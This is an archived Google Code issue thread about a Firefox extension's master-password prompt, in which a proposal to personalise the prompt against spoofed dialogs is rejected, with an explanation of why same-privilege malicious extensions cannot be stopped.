Prompt more secure

[GoogleCodeExporter]

Well than. What do you think about adding or changing the appearance of the 
prompt? A personal picture could help to indicate that the prompt is not a 
spoofed password request.
Firefox doesn't do anything to prevent extensions from accessing passwords 
because it would be pointless. The only way to prevent a malicious extension 
from getting to your passwords is to avoid installing a malicious extension in 
the first place. Even if nsILoginManager were not there, a malicious extension 
could still sniff on your communication with the web page when the password is 
transmitted. Or it could listen to what you type when asked for the master 
password. Or it could fake a master password dialog and get the master password 
directly. There are tons of possibilities - an application cannot possibly beat 
another application that is running with the same privileges.

PS: Software Security Device is for certificates, not passwords - entirely 
unrelated. But it uses the same master password, hence the confusing dialog.

Original issue reported on code.google.com by fox_wtsu...@Kurzepost.de on 11 Apr 2014 at 7:10

[GoogleCodeExporter]

First of all, there is no such as thing as "spoofed" password requests, because 
it's centralized module of Firefox/Thunderburd itself an any extensions can 
initialize the request at any moment they choice to, so changing appearance of 
the prompt won't do any good. 
Mozilla doesn't provide any means of trace where the request initialized from, 
therefore I don't see any ways to protect from malicious extension, other then 
follow simple commons sense:
1) only install extension from AMO website (http://addons.mozilla.org)
2) don't trust extensions that were never fully reviewed on AMO (these that 
have yellow buttons)

Original comment by van...@gmail.com on 12 Apr 2014 at 1:05

• Changed state: Rejected